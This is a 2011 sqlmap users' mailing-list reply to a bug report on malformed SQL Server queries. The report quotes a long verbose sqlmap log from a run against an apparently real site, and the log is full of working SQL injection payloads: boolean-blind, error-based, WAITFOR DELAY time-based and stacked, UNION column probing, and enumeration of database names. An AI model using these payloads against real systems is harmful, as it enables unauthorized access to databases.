Re: [sqlmap-users] Bug with Sql server querys

[Miroslav S. <mir...@gm...>]

hi David.

please update to the latest commit (r3289 - committed this moment) and retry.

kr

On Wed, Feb 9, 2011 at 1:24 PM, David Guimaraes <sk...@gm...> wrote:
> There is an error with Sql Server querys.. probably in queries.xml ?? The
> problem are these two ORDER BY in query send to server (--db, --tables,
> etc.). I checked it after upgrading to the latest svn revision.
>
> 20111' AND
> 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
> [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the
> keyword 'ORDER'.
>
> Log:
>
> #./sqlmap.py --cookie "ASPSESSIONIDCABDBSQC=..." -u
> "http://www.vuln.com/path/default.asp?p=20111" -p p -v 3 --dbs --flush
> --batch | tee saida.txt
>
>     sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [*] starting at: 09:55:04
>
> [09:55:04] [DEBUG] cleaning up configuration parameters
> [09:55:04] [DEBUG] setting the HTTP timeout
> [09:55:04] [DEBUG] setting the HTTP Cookie header
> [09:55:04] [DEBUG] setting the HTTP method to GET
> [09:55:04] [DEBUG] creating HTTP requests opener object
> [09:55:04] [WARNING] the testable parameter 'p' you provided is not into the
> Cookie
> [09:55:04] [INFO] using '/path/sqlmap-dev/output/www.vuln.com/session' as
> session file
> [09:55:04] [INFO] flushing session file
> [09:55:04] [INFO] testing connection to the target url
> [09:55:05] [INFO] testing if the url is stable, wait a few seconds
> [09:55:06] [INFO] url is stable
> [09:55:06] [PAYLOAD] 20111'(''')"(''
> [09:55:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:07] [INFO] heuristic test shows that GET parameter 'p' might be
> injectable (possible DBMS: Microsoft SQL Server)
> [09:55:07] [INFO] testing sql injection on GET parameter 'p'
> [09:55:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [09:55:07] [PAYLOAD] 20111) AND 4197=5111 AND (1965=1965
> [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
> [09:55:08] [PAYLOAD] 20111) AND 4255=4255 AND (6152=6152
> [09:55:08] [PAYLOAD] 20111 AND 3013=569
> [09:55:08] [DEBUG] setting match ratio for current parameter to 0.952
> [09:55:08] [PAYLOAD] 20111 AND 4255=4255
> [09:55:09] [PAYLOAD] 20111') AND 513=8635 AND ('kiwS'='kiwS
> [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:09] [PAYLOAD] 20111') AND 4255=4255 AND ('ofle'='ofle
> [09:55:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:09] [PAYLOAD] 20111' AND 8628=4076 AND 'Jbgn'='Jbgn
> [09:55:10] [DEBUG] setting match ratio for current parameter to 0.952
> [09:55:10] [PAYLOAD] 20111' AND 4255=4255 AND 'obQa'='obQa
> [09:55:10] [PAYLOAD] 20111' AND 9514=9437 AND 'ZUZG'='ZUZG
> [09:55:11] [INFO] GET parameter 'p' is 'AND boolean-based blind - WHERE or
> HAVING clause' injectable
> [09:55:11] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING
> clause (Generic comment)' because the payload for boolean-based blind has
> already been identified
> [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING
> clause' because the payload for boolean-based blind has already been
> identified
> [09:55:11] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING
> clause (Generic comment)' because the payload for boolean-based blind has
> already been identified
> [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter
> replace' because the payload for boolean-based blind has already been
> identified
> [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - Parameter
> replace (original value)' because the payload for boolean-based blind has
> already been identified
> [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and
> ORDER BY clauses' because the payload for boolean-based blind has already
> been identified
> [09:55:11] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and
> ORDER BY clauses (original value)' because the payload for boolean-based
> blind has already been identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based
> blind - Parameter replace (original value)' because the payload for
> boolean-based blind has already been identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based
> blind - ORDER BY clause' because the payload for boolean-based blind has
> already been identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked
> conditional-error blind queries' because the payload for boolean-based blind
> has already been identified
> [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause'
> [09:55:11] [PAYLOAD] 20111' AND
> 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl
> [09:55:11] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:11] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase AND
> error-based - WHERE or HAVING clause' injectable
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND
> error-based - WHERE or HAVING clause (IN)' because the payload for
> error-based has already been identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based
> - WHERE or HAVING clause' because the payload for error-based has already
> been identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based
> - WHERE or HAVING clause (IN)' because the payload for error-based has
> already been identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based -
> Parameter replace' because the payload for error-based has already been
> identified
> [09:55:11] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based -
> ORDER BY clause' because the payload for error-based has already been
> identified
> [09:55:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
> [09:55:11] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
> [09:55:17] [PAYLOAD] 20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
> [09:55:22] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase stacked
> queries' injectable
> [09:55:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
> [09:55:22] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
> [09:55:27] [PAYLOAD] 20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
> [09:55:33] [INFO] GET parameter 'p' is 'Microsoft SQL Server/Sybase
> time-based blind' injectable
> [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based
> blind (heavy query)' because the payload for AND/OR time-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based
> blind (heavy query - comment)' because the payload for AND/OR time-based
> blind has already been identified
> [09:55:33] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based
> blind (heavy query)' because the payload for AND/OR time-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING
> clause (MySQL comment)' because the payload for boolean-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING
> clause (MySQL comment)' because the payload for boolean-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - WHERE or
> HAVING clause (RLIKE)' because the payload for boolean-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter
> replace (MAKE_SET - original value)' because the payload for boolean-based
> blind has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter
> replace (ELT - original value)' because the payload for boolean-based blind
> has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind -
> Parameter replace (original value)' because the payload for boolean-based
> blind has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind -
> Parameter replace (original value)' because the payload for boolean-based
> blind has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter
> replace (original value)' because the payload for boolean-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP
> BY and ORDER BY clauses' because the payload for boolean-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY
> and ORDER BY clauses' because the payload for boolean-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle boolean-based blind - GROUP BY and
> ORDER BY clauses' because the payload for boolean-based blind has already
> been identified
> [09:55:33] [DEBUG] skipping test 'MySQL stacked conditional-error blind
> queries' because the payload for boolean-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked conditional-error blind
> queries' because the payload for boolean-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE or
> HAVING clause' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or
> HAVING clause' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING
> clause (XMLType)' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING
> clause (utl_inaddr.get_host_address)' because the payload for error-based
> has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING
> clause (ctxsys.drithsx.sn)' because the payload for error-based has already
> been identified
> [09:55:33] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING
> clause' because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE or
> HAVING clause' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING
> clause' because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or
> HAVING clause' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING
> clause (XMLType)' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING
> clause (utl_inaddr.get_host_address)' because the payload for error-based
> has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING
> clause (ctxsys.drithsx.sn)' because the payload for error-based has already
> been identified
> [09:55:33] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING
> clause' because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter
> replace' because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - Parameter
> replace' because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle error-based - Parameter replace'
> because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'Firebird error-based - Parameter replace'
> because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and
> ORDER BY clauses' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and
> ORDER BY clauses' because the payload for error-based has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Oracle error-based - GROUP BY and ORDER BY
> clauses' because the payload for error-based has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because
> the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy
> query)' because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because
> the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)'
> because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)'
> because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle stacked queries
> (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has
> already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (heavy query)'
> because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
> because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)'
> because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy
> query)' because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'Firebird stacked queries (heavy query)'
> because the payload for stacked queries has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 AND time-based blind
> (comment)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy
> query - comment)' because the payload for AND/OR time-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind
> (comment)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy
> query - comment)' because the payload for AND/OR time-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind' because the
> payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (comment)'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query -
> comment)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy
> query - comment)' because the payload for AND/OR time-based blind has
> already been identified
> [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Firebird AND time-based blind (heavy query
> - comment)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'MySQL > 5.0.11 OR time-based blind'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind' because the
> payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)'
> because the payload for AND/OR time-based blind has already been identified
> [09:55:33] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'Firebird OR time-based blind (heavy
> query)' because the payload for AND/OR time-based blind has already been
> identified
> [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 10
> columns' because the back-end DBMS identified is Microsoft SQL Server
> [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 11 to 20
> columns' because the level is higher than the provided
> [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 30
> columns' because the level is higher than the provided
> [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 31 to 40
> columns' because the level is higher than the provided
> [09:55:33] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 50
> columns' because the level is higher than the provided
> [09:55:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [09:55:33] [PAYLOAD] 20111' UNION ALL SELECT NULL-- AND 'vrjZ'='vrjZ
> [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL-- AND 'GZNB'='GZNB
> [09:55:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:34] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL-- AND
> 'dLhE'='dLhE
> [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND
> 'XeTw'='XeTw
> [09:55:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:35] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--
> AND 'trjE'='trjE
> [09:55:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:36] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
> NULL-- AND 'rjRE'='rjRE
> [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
> NULL, NULL-- AND 'vmHq'='vmHq
> [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:37] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
> NULL, NULL, NULL-- AND 'ZBcW'='ZBcW
> [09:55:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
> NULL, NULL, NULL, NULL-- AND 'qhhM'='qhhM
> [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
> NULL, NULL, NULL, NULL, NULL-- AND 'OaNn'='OaNn
> [09:55:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:38] [INFO] target url appears to be UNION injectable with 3 columns
> [09:55:38] [PAYLOAD] 20111' UNION ALL SELECT NULL,
> CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(100)+CHAR(102)+CHAR(99)+CHAR(99)
> AS NVARCHAR(4000)),
> CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND
> 'VYhx'='VYhx
> [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT NULL, NULL,
> CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(102)+CHAR(86)+CHAR(76)+CHAR(122)
> AS NVARCHAR(4000)),
> CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'TyzA'='TyzA
> [09:55:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:39] [PAYLOAD] 20111' UNION ALL SELECT
> CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(116)+CHAR(101)+CHAR(83)+CHAR(98)
> AS NVARCHAR(4000)),
> CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND
> 'bKpM'='bKpM
> [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:40] [PAYLOAD] -8546' UNION ALL SELECT NULL, NULL,
> CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(76)+CHAR(119)+CHAR(88)+CHAR(66)
> AS NVARCHAR(4000)),
> CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)-- AND 'HwBz'='HwBz
> [09:55:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:40] [PAYLOAD] -2422' UNION ALL SELECT
> CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(106)+CHAR(68)+CHAR(90)+CHAR(75)
> AS NVARCHAR(4000)),
> CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL, NULL-- AND
> 'hiSw'='hiSw
> [09:55:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:41] [PAYLOAD] -9676' UNION ALL SELECT NULL,
> CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+ISNULL(CAST(CHAR(111)+CHAR(120)+CHAR(102)+CHAR(77)
> AS NVARCHAR(4000)),
> CHAR(32))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58), NULL-- AND
> 'FIBp'='FIBp
> [09:55:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 11 to 20
> columns' because the level is higher than the provided
> [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 30
> columns' because the level is higher than the provided
> [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40
> columns' because the level is higher than the provided
> [09:55:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50
> columns' because the level is higher than the provided
> [09:55:43] [INFO] GET parameter 'p' is vulnerable. Do you want to keep
> testing the others? [y/N] N
> [09:55:43] [DEBUG] used the default behaviour, running in batch mode
> sqlmap identified the following injection points with a total of 30 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: p
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: p=20111' AND 4255=4255 AND 'obQa'='obQa
>
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
>     Payload: p=20111' AND
> 87=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> (CASE WHEN (87=87) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'wAZl'='wAZl
>
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries
>     Payload: p=20111'; WAITFOR DELAY '0:0:5';-- AND 'Hlos'='Hlos
>
>     Type: AND/OR time-based blind
>     Title: Microsoft SQL Server/Sybase time-based blind
>     Payload: p=20111' WAITFOR DELAY '0:0:5'-- AND 'YKua'='YKua
> ---
>
> [09:55:43] [INFO] testing Microsoft SQL Server
> [09:55:43] [PAYLOAD] 20111' AND
> 876=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> (CASE WHEN (BINARY_CHECKSUM(76)=BINARY_CHECKSUM(76)) THEN CHAR(49) ELSE
> CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND
> 'XHDB'='XHDB
> [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:44] [INFO] retrieved: 1
> [09:55:44] [DEBUG] performed 1 queries in 0 seconds
> [09:55:44] [INFO] confirming Microsoft SQL Server
> [09:55:44] [PAYLOAD] 20111' AND
> 2557=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> (CASE WHEN (HOST_NAME()=HOST_NAME()) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'eONH'='eONH
> [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:44] [INFO] retrieved: 1
> [09:55:44] [DEBUG] performed 1 queries in 0 seconds
> [09:55:44] [PAYLOAD] 20111' AND
> 1181=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> (CASE WHEN (XACT_STATE()=XACT_STATE()) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'erPM'='erPM
> [09:55:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:44] [INFO] retrieved: 1
> [09:55:44] [DEBUG] performed 1 queries in 0 seconds
> [09:55:44] [PAYLOAD] 20111' AND
> 2691=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> (CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ZLNT'='ZLNT
> [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:45] [INFO] retrieved: 1
> [09:55:45] [DEBUG] performed 1 queries in 0 seconds
> [09:55:45] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
> [09:55:45] [INFO] fetching database names
> [09:55:45] [PAYLOAD] 20111' AND
> 7776=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> ISNULL(CAST(COUNT(name) AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND
> 'IIWR'='IIWR
> [09:55:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:45] [INFO] the SQL query used returns 37 entries
> [09:55:45] [PAYLOAD] 20111' AND
> 6339=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'trwh'='trwh
> [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:46] [PAYLOAD] 20111' AND
> 5378=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'nEZn'='nEZn
> [09:55:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:46] [PAYLOAD] 20111' AND
> 3153=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'PAcn'='PAcn
> [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:47] [PAYLOAD] 20111' AND
> 2020=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 3 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'KnEl'='KnEl
> [09:55:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)
> [09:55:47] [PAYLOAD] 20111' AND
> 8124=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
> TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
> master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM
> master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
> 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'vwnC'='vwnC
> [09:55:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)
